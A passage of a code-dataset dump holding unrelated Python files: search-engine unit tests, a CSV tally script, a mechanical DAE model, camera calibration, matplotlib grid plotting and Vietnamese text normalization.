2010 and discontinued in Sep.\n# 2014; the eventual fix should use https://cse.google.com/cse/ and this hack:\n# http://stackoverflow.com/a/11206266/1846915\n#\n# update as of 2017-01-14: this has been fixed\nclass TestSearch(unittest.TestCase):\n def setUp(self):\n self.skip_msg = '{:s} is down, skipping test.'\n self.engines = {\n 'Google': 'https://google.com',\n 'Bing': 'https://bing.com',\n 'DuckDuckGo': 'https://duckduckgo.com',\n 'Suggestion script': 'http://websitedev.de'\n }\n self.phenny = MagicMock()\n self.input = MagicMock()\n\n def test_google_search(self):\n if not is_up(self.engines['Google']):\n self.skipTest(self.skip_msg.format('Google'))\n self.input.group.return_value = 'vtluug virginia phenny'\n results = google_search(self.input, my_api_key, my_cse_id)\n self.assertTrue(results)\n\n def test_gsearch(self):\n if not is_up(self.engines['Google']):\n self.skipTest(self.skip_msg.format('Google'))\n self.input.group.return_value = 'vtluug virginia phenny'\n gsearch(self.phenny, self.input)\n self.assertTrue(self.phenny.say.called)\n\n def test_bing_search(self):\n if not is_up(self.engines['Bing']):\n self.skipTest(self.skip_msg.format('Bing'))\n out = bing_search('phenny')\n m = re.match('^https?://.*$', out, flags=re.UNICODE)\n self.assertTrue(m)\n\n def test_bing(self):\n if not is_up(self.engines['Bing']):\n self.skipTest(self.skip_msg.format('Bing'))\n self.input.group.return_value = 'swhack'\n bing(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called)\n\n def test_duck_search(self):\n if not is_up(self.engines['DuckDuckGo']):\n self.skipTest(self.skip_msg.format('DuckDuckGo'))\n out = unquote(duck_search('phenny'))\n m = re.match(r'^https?://.*$', out, flags=re.UNICODE)\n self.assertTrue(m)\n\n def test_duck(self):\n if not is_up(self.engines['DuckDuckGo']):\n self.skipTest(self.skip_msg.format('DuckDuckGo'))\n self.input.group.return_value = 'swhack'\n duck(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called)\n\n def test_search(self):\n # skip only when none of the engines is reachable\n if not (is_up(self.engines['DuckDuckGo']) or is_up(self.engines['Bing']) or is_up(self.engines['Google'])):\n self.skipTest('All search engines are down, skipping test.')\n self.input.group.return_value = 'vtluug'\n search(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called)\n\n def test_suggest(self):\n if not is_up(self.engines['Suggestion script']):\n self.skipTest(self.skip_msg.format('Suggestion script'))\n self.input.group.return_value = 'vtluug'\n suggest(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called or self.phenny.say.called)\n","sub_path":"modules/test/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"296665538","text":"import json \nimport csv\n \n# Opening JSON file \nde = 0\nothers = 0\nde_list =[\"Germany\"]\nothers_list = [\"Others\"]\n\nfile_= open('data.csv', 'w')\n\nwith file_:\n writer = csv.writer(file_)\n\n for i in range(1,13):\n filename = str(i) + \".json\"\n print(filename)\n f = open(filename,) \n\n # returns JSON object as \n # a dictionary \n data = json.load(f) \n \n # Iterating through the json \n # list \n temp = 0\n for item in data['items']: \n for countries in item['countries']:\n if(countries['country']==\"DE\"):\n de_list.append(countries['editors-ceil'])\n de = de + countries['editors-ceil']\n else:\n temp = temp + countries['editors-ceil']\n others = others + countries['editors-ceil']\n \n 
others_list.append(temp)\n\n # print(de)\n # print(others)\n # Closing file \n\n f.close() \n\n de_list.append(de)\n others_list.append(others)\n \n writer.writerow([\"Country\",\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\",\"TOTAL\"])\n\n writer.writerow(de_list)\n writer.writerow(others_list)\n file_.close()","sub_path":"editors data 2020/editors_by_country/de.wikipedia/editors with 5 - 99 edits/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"65760866","text":"from scipy import *\n\ndef init_squeezer():\n\t\"\"\" \n\tThe positions y_1 (q vector)\n\tThe constraint multipliers lambda\n\ty stacks horizontally: positions, derivatives, lambdas\n\typ holds the derivatives of the angles/positions\n\t\"\"\"\n\ty_1 = array([-0.0617138900142764496358948458001, # beta\n\t\t\t\t0., # theta\n\t\t\t\t0.455279819163070380255912382449, # gamma\n\t\t\t\t0.222668390165885884674473185609, # phi\n\t\t\t\t0.487364979543842550225598953530, # delta\n\t\t\t\t-0.222668390165885884674473185609, # Omega\n\t\t\t\t1.23054744454982119249735015568]) #epsilon\n\tlamb = array([\n\t\t\t98.5668703962410896057654982170, # lambda[0]\n\t\t\t-6.12268834425566265503114393122]) # lambda[1]\t\t\t\n\ty=hstack((y_1,zeros((7,)),lamb,zeros((4,))))\n\typ=hstack((zeros(7,),array([\n\t\t\t14222.4439199541138705911625887, # betadotdot\n\t\t\t-10666.8329399655854029433719415, # Thetadotdot\n\t\t\t0.,0.,0.,0.,0.]),zeros((6,))))\n\treturn y,yp\n\ndef squeezer (t, y, yp, index):\n\t\"\"\"\n\tResidual function of the 7-bar mechanism in\n\tHairer, Vol. II, p. 533 ff, see also formula (7.11)\n\twritten in residual form\n\ty,yp vector of dim 20, t scalar\n\t\"\"\"\n\t# Inertia data\n\tm1,m2,m3,m4,m5,m6,m7=.04325,.00365,.02373,.00706,.07050,.00706,.05498\n\ti1,i2,i3,i4,i5,i6,i7=2.194e-6,4.410e-7,5.255e-6,5.667e-7,1.169e-5,5.667e-7,1.912e-5\n\t# Geometry\n\txa,ya=-.06934,-.00227\n\txb,yb=-0.03635,.03273\n\txc,yc=.014,.072\n\td,da,e,ea=28.e-3,115.e-4,2.e-2,1421.e-5\n\trr,ra=7.e-3,92.e-5\n\tss,sa,sb,sc,sd=35.e-3,1874.e-5,1043.e-5,18.e-3,2.e-2\n\tta,tb=2308.e-5,916.e-5\n\tu,ua,ub=4.e-2,1228.e-5,449.e-5\n\tzf,zt=2.e-2,4.e-2\n\tfa=1421.e-5\n\t# Driving torque\n\tmom=0.033\n\t# Spring data\n\tc0=4530.\n\tlo=0.07785\n\n\t# Initial computations and assignments\n\tbeta,theta,gamma,phi,delta,omega,epsilon=y[0:7]\n\tif index != 0:\n\t\tbep,thp,gap,php,dep,omp,epp=y[7:14]\n\t\tlamb=y[14:20]\n\tsibe,sith,siga,siph,side,siom,siep=sin(y[0:7])\n\tcobe,coth,coga,coph,code,coom,coep=cos(y[0:7])\n\t\n\t# Start calculating\n\tsibeth = sin(beta+theta);cobeth = cos(beta+theta)\n\tsiphde = sin(phi+delta);cophde = cos(phi+delta)\n\tsiomep = sin(omega+epsilon);coomep = cos(omega+epsilon)\n\n\n\t# Mass matrix\n\tm=zeros((7,7))\n\tm[0,0] = m1*ra**2 + m2*(rr**2-2*da*rr*coth+da**2) + i1 + i2\n\tm[1,0] = m[0,1] = m2*(da**2-da*rr*coth) + i2\n\tm[1,1] = m2*da**2 + i2\n\tm[2,2] = m3*(sa**2+sb**2) + i3\n\tm[3,3] = m4*(e-ea)**2 + i4\n\tm[4,3] = m[3,4] = m4*((e-ea)**2+zt*(e-ea)*siph) + i4\n\tm[4,4] = m4*(zt**2+2*zt*(e-ea)*siph+(e-ea)**2) + m5*(ta**2+tb**2)+ i4 + i5\n\tm[5,5] = m6*(zf-fa)**2 + i6\n\tm[6,5] = m[5,6] = m6*((zf-fa)**2-u*(zf-fa)*siom) + i6\n\tm[6,6] = m6*((zf-fa)**2-2*u*(zf-fa)*siom+u**2) + m7*(ua**2+ub**2)+ i6 + i7\n\n\t# Applied forces\n\n\txd = sd*coga + sc*siga + xb\n\tyd = sd*siga - sc*coga + yb\n\tlang = sqrt ((xd-xc)**2 + (yd-yc)**2)\n\tforce = - c0 * (lang - lo)/lang\n\tfx = force * 
(xd-xc)\n\tfy = force * (yd-yc)\n\tif index != 0:\n\t\tff=array([\n\t\t\tmom - m2*da*rr*thp*(thp+2*bep)*sith,\t\n\t\t\tm2*da*rr*bep**2*sith,\n\t\t\tfx*(sc*coga - sd*siga) + fy*(sd*coga + sc*siga),\n\t\t\tm4*zt*(e-ea)*dep**2*coph,\n\t\t\t- m4*zt*(e-ea)*php*(php+2*dep)*coph,\n\t\t\t- m6*u*(zf-fa)*epp**2*coom,\n\t\t\tm6*u*(zf-fa)*omp*(omp+2*epp)*coom])\n\n\t# constraint matrix G\n\n\tgp=zeros((6,7))\n\t\n\tgp[0,0] = - rr*sibe + d*sibeth\n\tgp[0,1] = d*sibeth\n\tgp[0,2] = - ss*coga\n\tgp[1,0] = rr*cobe - d*cobeth\n\tgp[1,1] = - d*cobeth\n\tgp[1,2] = - ss*siga\n\tgp[2,0] = - rr*sibe + d*sibeth\n\tgp[2,1] = d*sibeth\n\tgp[2,3] = - e*cophde\n\tgp[2,4] = - e*cophde + zt*side\n\tgp[3,0] = rr*cobe - d*cobeth\n\tgp[3,1] = - d*cobeth\n\tgp[3,3] = - e*siphde\n\tgp[3,4] = - e*siphde - zt*code\n\tgp[4,0] = - rr*sibe + d*sibeth\n\tgp[4,1] = d*sibeth\n\tgp[4,5] = zf*siomep\n\tgp[4,6] = zf*siomep - u*coep\n\tgp[5,0] = rr*cobe - d*cobeth\n\tgp[5,1] = - d*cobeth\n\tgp[5,5] = - zf*coomep\n\tgp[5,6] = - zf*coomep - u*siep\n\n\t# Index-3 constraint\n\tg=zeros((6,))\n\tg[0] = rr*cobe - d*cobeth - ss*siga - xb\n\tg[1] = rr*sibe - d*sibeth + ss*coga - yb\n\tg[2] = rr*cobe - d*cobeth - e*siphde - zt*code - xa\n\tg[3] = rr*sibe - d*sibeth + e*cophde - zt*side - ya\n\tg[4] = rr*cobe - d*cobeth - zf*coomep - u*siep - xa\n\tg[5] = rr*sibe - d*sibeth - zf*siomep + u*coep - ya\n\n\t# Construction of the residual\n\tif index == 3:\n\t\tres_1 = yp[0:7] - y[7:14]\n\t\tres_2 = dot(m,yp[7:14]) - ff[0:7]+dot(gp.T,lamb)\n\t\tres_3 = g\n\n\telif index == 2:\n\t\tres_1 = yp[0:7] - y[7:14]\n\t\tres_2 = dot(m,yp[7:14]) - ff[0:7]+dot(gp.T,lamb)\n\t\tw = y[7:14]\n\t\tres_3 = dot(gp,w)\n\n\telif index == 1:\n\t\tgpp=zeros((6,))\n\t\tw = y[7:14]\n\t\tgpp[0]=-rr*cobe*w[0]**2 + d*cobeth*(w[0]+w[1])**2 + ss*siga*w[2]**2\n\t\tgpp[1]=-rr*sibe*w[0]**2 + d*sibeth*(w[0]+w[1])**2 - ss*coga*w[2]**2\n\t\tgpp[2]=-rr*cobe*w[0]**2 + d*cobeth*(w[0]+w[1])**2 + e*siphde*(w[3]+w[4])**2 + zt*code*w[4]**2\n\t\tgpp[3]=-rr*sibe*w[0]**2 + d*sibeth*(w[0]+w[1])**2 - e*cophde*(w[3]+w[4])**2 + zt*side*w[4]**2 \n\t\tgpp[4]=-rr*cobe*w[0]**2 + d*cobeth*(w[0]+w[1])**2 + zf*coomep*(w[5]+w[6])**2 + u*siep*w[6]**2\n\t\tgpp[5]=-rr*sibe*w[0]**2 + d*sibeth*(w[0]+w[1])**2 + zf*siomep*(w[5]+w[6])**2 - u*coep*w[6]**2\n\n\t\treturn y, m, ff, gp, gpp\n\n\telse:\n\t\t# This function is used solely to get the g function for finding initial values\n\t\treturn g\n\n\treturn hstack((res_1,res_2,res_3))\n\n\t","sub_path":"squeezer_HsnppkU.py","file_name":"squeezer_HsnppkU.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"321725416","text":"import cv2\nimport glob\nimport numpy as np\nimport pickle\n\nclass Camera():\n \n def __init__(self, filename='camera_cal/calibration1.jpg', nx=9, ny=6):\n self.objpoints = []\n self.imgpoints = []\n self.nx = nx\n self.ny = ny\n self.mtx = None\n self.dist = None\n self.M = None\n self.Minv = None\n \n # Load calibration settings.\n self._calibrate(filename)\n\n def _calibrate(self, filename):\n \"\"\" Calibrate the camera.\"\"\"\n img = cv2.imread(filename)\n self._get_distortion(img)\n \n \n def _calibrate_camera(self, filepath='camera_cal/calibration*.jpg'):\n \"\"\" Camera Calibration.\"\"\"\n\n # Load calibration images.\n images = glob.glob(filepath)\n objp = np.zeros((self.nx*self.ny,3), np.float32)\n objp[:,:2] = np.mgrid[0:self.nx, 0:self.ny].T.reshape(-1,2)\n\n # Pass through all images.\n for idx, fname in enumerate(images):\n img = 
cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, corners = cv2.findChessboardCorners(gray, (self.nx,self.ny), None)\n if ret == True: \n self.objpoints.append(objp)\n self.imgpoints.append(corners)\n\n def _get_distortion(self, img, filename='camera_cal/wide_dist_pickle.p'):\n \"\"\" Saves distortion matrix.\"\"\"\n try:\n dist_pickle = pickle.load(open(filename, \"rb\"))\n self.mtx = dist_pickle[\"mtx\"]\n self.dist = dist_pickle[\"dist\"]\n except:\n # No cached result: run calibration, which fills self.objpoints and self.imgpoints.\n self._calibrate_camera()\n img_size = (img.shape[1], img.shape[0])\n ret, self.mtx, self.dist, rvecs, tvecs = cv2.calibrateCamera(self.objpoints, self.imgpoints, img_size, None, None)\n dst = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n\n # Save the camera calibration result for later use.\n dist_pickle = {}\n dist_pickle[\"mtx\"] = self.mtx\n dist_pickle[\"dist\"] = self.dist\n pickle.dump( dist_pickle, open( filename, \"wb\" ) )\n\n def warp_image(self, img):\n \"\"\"Warp Image\n \n Returns:\n Image, top-down view of original image.\n \"\"\"\n # Undistort the image.\n undist = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n\n # Define lane region with lines.\n corners = [[580, 455],[695, 455],[1060, 690],[250, 690]]\n\n # Define src and dst regions.\n src = np.float32([corners[0], corners[1], corners[2], corners[3]])\n offset = [200, 30]\n img_size = (img.shape[1], img.shape[0])\n dst = np.float32([[offset[0], offset[1]], \n [img_size[0]-offset[0], offset[1]], \n [img_size[0]-offset[0], img_size[1]-offset[1]], \n [offset[0], img_size[1]-offset[1]]])\n self.M = cv2.getPerspectiveTransform(src, dst)\n self.Minv = cv2.getPerspectiveTransform(dst, src)\n\n return cv2.warpPerspective(undist, self.M, img_size)\n \n def unwarp_image(self, img):\n \"\"\" Unwarp Image to Original\n Returns:\n Image, unwarped image of original.\n \"\"\"\n img_size = (img.shape[1], img.shape[0])\n return cv2.warpPerspective(img, self.Minv, img_size, flags=cv2.INTER_LINEAR)","sub_path":"main/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"253529637","text":"from clients.models import ClientProfile, ProfileImage\nfrom models import Website\n\ndef website_from_profile(profile, cluster):\n\twebsite = Website(\n\t\taccount_key = profile.account_key, \n\t\treturn_url = profile.return_url, \n\t\twebsite_name = profile.website_name,\n\t\twebsite_url = profile.website,\n\t\tcluster = cluster\n\t\t)\n\twebsite.save()\n\treturn website\n\ndef clean_website_url(website_url):\n\tclean = website_url\n\tif clean.startswith('https://'):\n\t\tclean = website_url[len('https://'):]\n\telif clean.startswith('http://'):\n\t\tclean = website_url[len('http://'):]\n\tif clean.endswith('/'):\n\t\tclean = clean[0:len(clean)-1]\n\treturn clean\n\ndef profile_for_cluster(cluster):\n\tprofile = ClientProfile.objects.get(user = cluster.creator)\n\treturn profile\n\ndef profile_image_for_profile(profile):\n\tprofile_image = ProfileImage.objects.get(profile = profile)\n\treturn profile_image\n\ndef profile_image_for_cluster(cluster):\n\tprofile = profile_for_cluster(cluster)\n\treturn profile_image_for_profile(profile)","sub_path":"website_clusters/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"11443457","text":"# Copyright 2021, Google LLC.\n#\n# Licensed under the Apache 
License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for dirichlet.\"\"\"\n\nimport collections\nimport itertools\n\nfrom absl.testing import parameterized\nimport tensorflow as tf\n\nfrom generalization.synthesization import dirichlet\n\n\nclass DirichletTest(tf.test.TestCase, parameterized.TestCase):\n\n @parameterized.named_parameters(\n (f'num_clients={num_clients}, rotate={rotate}', num_clients, rotate)\n for num_clients, rotate in itertools.product([1, 2, 3], [True, False]))\n def test_synthesize_by_dirichlet_over_labels(self, num_clients, rotate):\n test_dataset = tf.data.Dataset.from_tensor_slices(\n collections.OrderedDict(\n x=list(range(9)), foo=['a', 'b', 'c'] * 3, label=[0, 1, 6] * 3))\n cd = dirichlet.synthesize_by_dirichlet_over_labels(\n dataset=test_dataset, num_clients=num_clients, use_rotate_draw=rotate)\n\n self.assertCountEqual(cd.client_ids, map(str, range(num_clients)))\n\n expected_num_elements_per_client = (9 // num_clients)\n\n for client_id in cd.client_ids:\n local_ds = cd.create_tf_dataset_for_client(client_id)\n self.assertLen(list(local_ds), expected_num_elements_per_client)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"generalization/synthesization/dirichlet_test.py","file_name":"dirichlet_test.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"481449517","text":"\nimport sounddevice as sd\nfrom scipy.io.wavfile import write\n\ndef record_audio(correct_length):\n print(\"Start speaking...\")\n fs = 44100 # Sample rate\n seconds = correct_length*2.5 # Duration of recording\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)\n sd.wait() # Wait until recording is finished\n write('input_sound.wav', fs, myrecording) # Save as WAV file","sub_path":"Azure/record_audio.py","file_name":"record_audio.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"653974487","text":"from matplotlib.transforms import BboxTransformTo\nfrom matplotlib.transforms import Bbox\nfrom limix_util.dict import traverse_dict\nfrom math import sqrt\n\ndef _grid_trans(nrow, ncol, i):\n r = int(i / ncol)\n c = int(i % ncol)\n h = 1. / nrow\n w = 1. 
/ ncol\n y0 = 1 - (r+1) * h\n x0 = c * w\n box = Bbox.from_bounds(x0, y0, w, h)\n return BboxTransformTo(box)\n\nclass _GridPlot(object):\n def __init__(self, visit_func, fig):\n self._fig = fig\n\n self._min_box_width = float('inf')\n self._min_box_height = float('inf')\n self._visit_func = visit_func\n\n h = 0.1 * 2/4.\n self._title_trans = BboxTransformTo(Bbox.from_bounds(0, 1-h, 1, h))\n self._body_trans = BboxTransformTo(Bbox.from_bounds(0, 0, 1, 1-h))\n self._axes_trans = BboxTransformTo(Bbox.from_bounds(0.1, 0.15, 0.8, 0.75))\n\n # self._color_cycle = cycle(color_palette(\"husl\", 8))\n\n def traverse(self, group_names, data):\n trans = BboxTransformTo(Bbox.from_bounds(0.015, 0.005, 1-0.03, 1-0.005))\n opts = dict(names=group_names, trans=trans)\n traverse_dict(data, self._callback, opts)\n\n def adjust_figsize(self):\n # default_fig_size\n dfs = (8., 6.)\n # default_axis_size\n das = (0.77500000000000002, 0.80000000000000004)\n\n width = dfs[0] * das[0] / self._min_box_width\n height = dfs[1] * das[1] / self._min_box_height\n self._fig.set_size_inches(width, height)\n\n\n def _callback(self, d, opt):\n n = len(d)\n # plot_this = n > 0 and\\\n # (not isinstance(d, dict) or len(opt['names']) == 0)\n # import ipdb; ipdb.set_trace()\n if opt is None:\n return\n plot_this = n > 0 and len(opt['names']) == 0\n\n if plot_this:\n trans = self._axes_trans + opt['trans']\n (x0, y0) = trans.transform([0, 0])\n (x1, y1) = trans.transform([1, 1])\n axes = self._fig.add_axes([x0, y0, x1-x0, y1-y0])\n\n self._visit_func(d, axes)\n\n box = axes.get_position()\n self._min_box_width = min(box.width, self._min_box_width)\n self._min_box_height = min(box.height, self._min_box_height)\n else:\n (x, y) = (self._title_trans + opt['trans']).transform((0.5, 0.5))\n\n # color = next(self._color_cycle)\n self._fig.text(x, y, opt['names'][0], horizontalalignment='center',\n verticalalignment='center')\n\n\n nrow = ncol = int(sqrt(n))\n if nrow * ncol < n:\n ncol += 1\n if nrow * ncol < n:\n nrow += 1\n\n opts = []\n\n for i in range(len(d)):\n grid_trans = _grid_trans(nrow, ncol, i)\n cell_trans = (grid_trans + self._body_trans + opt['trans'])\n (x, y) = (self._title_trans + cell_trans).transform((0.5, 1.))\n\n self._fig.text(x, y, d.keys()[i], horizontalalignment='center',\n verticalalignment='center')\n\n nopt = dict(names=opt['names'][1:],\n trans=self._body_trans+cell_trans)\n opts.append(nopt)\n\n return opts\n\ndef grid_plot(group_names, data, visit_func, fig):\n gp = _GridPlot(visit_func, fig=fig)\n gp.traverse(group_names, data)\n gp.adjust_figsize()\n","sub_path":"limix_plot/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"56154361","text":"# This file is part of the Adblock Plus web scripts,\n# Copyright (C) 2006-present eyeo GmbH\n#\n# Adblock Plus is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 3 as\n# published by the Free Software Foundation.\n#\n# Adblock Plus is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Adblock Plus. 
If not, see .\n\nimport pytest\n\nfrom sitescripts.utils import get_template\n\n\ndef test_get_template_default_path():\n \"\"\"Load template from inside sitescripts.\"\"\"\n template = get_template('__init__.py')\n assert template.render({}).startswith('# This file')\n\n\n@pytest.mark.parametrize('mode', ['relative', 'absolute'])\ndef test_get_template(tmpdir, mode):\n \"\"\"Load template using relative or absolute path.\"\"\"\n template_path = tmpdir.join('template.tmpl')\n template_path.write('value = {{ value }}')\n\n if mode == 'absolute':\n template = get_template(template_path.strpath)\n else:\n template = get_template('template.tmpl', template_path=tmpdir.strpath)\n\n assert template.render({'value': 1}) == 'value = 1'\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"159558575","text":"from sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import classification_report\r\nimport numpy as np\r\nimport regex as re\r\nfrom pyvi import ViTokenizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport os\r\nimport pickle\r\nimport time\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\n\r\nuniChars = \"àáảãạâầấẩẫậăằắẳẵặèéẻẽẹêềếểễệđìíỉĩịòóỏõọôồốổỗộơờớởỡợùúủũụưừứửữựỳýỷỹỵÀÁẢÃẠÂẦẤẨẪẬĂẰẮẲẴẶÈÉẺẼẸÊỀẾỂỄỆĐÌÍỈĨỊÒÓỎÕỌÔỒỐỔỖỘƠỜỚỞỠỢÙÚỦŨỤƯỪỨỬỮỰỲÝỶỸỴÂĂĐÔƠƯ\"\r\nunsignChars = \"aaaaaaaaaaaaaaaaaeeeeeeeeeeediiiiiooooooooooooooooouuuuuuuuuuuyyyyyAAAAAAAAAAAAAAAAAEEEEEEEEEEEDIIIOOOOOOOOOOOOOOOOOOOUUUUUUUUUUUYYYYYAADOOU\"\r\n\r\n\r\ndef loaddicchar():\r\n dic = {}\r\n char1252 = 'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|e��|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ'.split(\r\n '|')\r\n charutf8 = \"à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ\".split(\r\n '|')\r\n for i in range(len(char1252)):\r\n dic[char1252[i]] = charutf8[i]\r\n return dic\r\n\r\n\r\ndicchar = loaddicchar()\r\n\r\n# Hàm chuyển Unicode dựng sẵn về Unicde tổ hợp (phổ biến hơn)\r\ndef convert_unicode(txt):\r\n return re.sub(\r\n r'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ',\r\n lambda x: dicchar[x.group()], txt)\r\n\r\n\r\nbang_nguyen_am = [['a', 'à', 'á', 'ả', 'ã', 'ạ', 'a'],\r\n ['ă', 'ằ', 'ắ', 'ẳ', 'ẵ', 'ặ', 'aw'],\r\n ['â', 'ầ', 'ấ', 'ẩ', 'ẫ', 'ậ', 'aa'],\r\n ['e', 'è', 'é', 'ẻ', 'ẽ', 'ẹ', 'e'],\r\n ['ê', 'ề', 'ế', 'ể', 'ễ', 'ệ', 'ee'],\r\n ['i', 'ì', 'í', 'ỉ', 'ĩ', 'ị', 'i'],\r\n ['o', 'ò', 'ó', 'ỏ', 'õ', 'ọ', 'o'],\r\n ['ô', 'ồ', 'ố', 'ổ', 'ỗ', 'ộ', 'oo'],\r\n ['ơ', 'ờ', 'ớ', 'ở', 'ỡ', 'ợ', 'ow'],\r\n ['u', 'ù', 'ú', 'ủ', 'ũ', 'ụ', 'u'],\r\n ['ư', 'ừ', 'ứ', 'ử', 'ữ', 'ự', 'uw'],\r\n ['y', 'ỳ', 'ý', 'ỷ', 'ỹ', 'ỵ', 'y']]\r\nbang_ky_tu_dau = ['', 'f', 's', 'r', 'x', 'j']\r\n\r\nnguyen_am_to_ids = {}\r\n\r\nfor i in 
range(len(bang_nguyen_am)):\r\n for j in range(len(bang_nguyen_am[i]) - 1):\r\n nguyen_am_to_ids[bang_nguyen_am[i][j]] = (i, j)\r\n\r\n\r\ndef chuan_hoa_dau_tu_tieng_viet(word):\r\n if not is_valid_vietnam_word(word):\r\n return word\r\n\r\n chars = list(word)\r\n dau_cau = 0\r\n nguyen_am_index = []\r\n qu_or_gi = False\r\n for index, char in enumerate(chars):\r\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\r\n if x == -1:\r\n continue\r\n elif x == 9: # check qu\r\n if index != 0 and chars[index - 1] == 'q':\r\n chars[index] = 'u'\r\n qu_or_gi = True\r\n elif x == 5: # check gi\r\n if index != 0 and chars[index - 1] == 'g':\r\n chars[index] = 'i'\r\n qu_or_gi = True\r\n if y != 0:\r\n dau_cau = y\r\n chars[index] = bang_nguyen_am[x][0]\r\n if not qu_or_gi or index != 1:\r\n nguyen_am_index.append(index)\r\n if len(nguyen_am_index) 